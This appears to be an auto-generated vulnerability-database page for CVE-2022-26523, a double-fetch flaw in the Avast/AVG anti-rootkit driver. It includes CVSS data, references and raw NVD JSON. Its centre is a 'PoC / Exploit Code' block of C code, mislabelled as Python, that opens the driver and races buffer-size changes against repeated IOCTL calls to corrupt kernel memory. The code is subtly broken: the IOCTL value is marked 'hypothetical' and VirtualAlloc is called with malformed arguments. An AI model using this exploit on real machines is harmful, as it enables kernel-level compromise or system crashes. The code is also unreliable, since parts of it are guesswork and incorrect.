CVE-2022-26523

Description

The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xbb94.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Avast Windows Anti Rootkit Driver < 22.1

AVG Windows Anti Rootkit Driver < 22.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>
#include <stdio.h>

// IOCTL value for the vulnerable function (hypothetical)
#define VULN_IOCTL 0x222003

typedef struct _EXPLOIT_STRUCT {
    DWORD Size;
    CHAR Data[0x100];
} EXPLOIT_STRUCT;

EXPLOIT_STRUCT* UserBuffer;

DWORD WINAPI RaceConditionThread(LPVOID lpParam) {
    while (TRUE) {
        // Toggle size to trigger Double Fetch between validation and usage
        UserBuffer->Size = 0x1000; // Malicious large size
        Sleep(0);
        UserBuffer->Size = 0x100;  // Valid size for check
    }
    return 0;
}

int main() {
    HANDLE hDevice = CreateFileA("\\\\.\\aswArPot", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }

    UserBuffer = (EXPLOIT_STRUCT*)VirtualAlloc(NULL, sizeof(EXPLOIT_STRUCT), MEM_COMMIT | PAGE_READWRITE);
    UserBuffer->Size = 0x100;
    memset(UserBuffer->Data, 0x41, 0x100);

    printf("[+] Starting race condition thread...\n");
    HANDLE hThread = CreateThread(NULL, 0, RaceConditionThread, NULL, 0, NULL);

    DWORD bytesReturned;
    printf("[+] Sending IOCTLs...\n");
    for (int i = 0; i < 10000; i++) {
        DeviceIoControl(hDevice, VULN_IOCTL, UserBuffer, sizeof(EXPLOIT_STRUCT), NULL, 0, &bytesReturned, NULL);
    }

    printf("[+] Exploit attempt finished.\n");
    CloseHandle(hDevice);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-26523
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-26523
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-26523/
[4] VulDB https://vuldb.com/cve/CVE-2022-26523
[5] https://www.avast.com/bug-bounty
[6] https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-26523", "sourceIdentifier": "[email protected]", "published": "2026-05-08T05:16:09.033", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xbb94."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://www.avast.com/bug-bounty", "source": "[email protected]"}, {"url": "https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/", "source": "[email protected]"}]}}